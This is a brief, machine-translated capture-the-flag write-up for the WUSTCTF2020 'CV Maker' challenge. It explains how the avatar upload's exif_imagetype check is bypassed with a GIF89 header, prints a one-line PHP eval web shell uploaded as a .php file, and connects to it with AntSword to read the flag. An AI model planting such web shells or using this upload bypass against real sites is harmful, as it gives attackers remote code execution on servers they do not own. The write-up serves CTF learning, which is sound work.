[WUSTCTF2020]CV Maker

[WUSTCTF2020]CV Maker

f12 Nothing was found , Register login , It is found that the avatar can be changed , Guess file upload vulnerability

If you upload a normal photo , It is uploaded successfully and will be displayed , But if you upload one txt（ I am the one who uploaded txt file ） Will show exif_imagetype not image!

exif_imagetype function ： Used to judge the type of an image , Read the first byte of the image and check its signature , This function can be used to avoid calling other exif The function uses an unsupported file type or and $_SERVER['HTTP_ACCEPT'] Use in combination to check whether the browser can display a specified image .

Directly upload a one sentence Trojan horse with a picture header , Renamed as 1.php Upload , Find out php Files can also be uploaded directly ：

GIF89

<?php

eval($_POST['123']);

?>

then f12, Found out uploads

Ant sword can be directly connected flag,url The address is ：

http://xxxxxx.buuoj.cn:81/uploads/xxxx/profile.php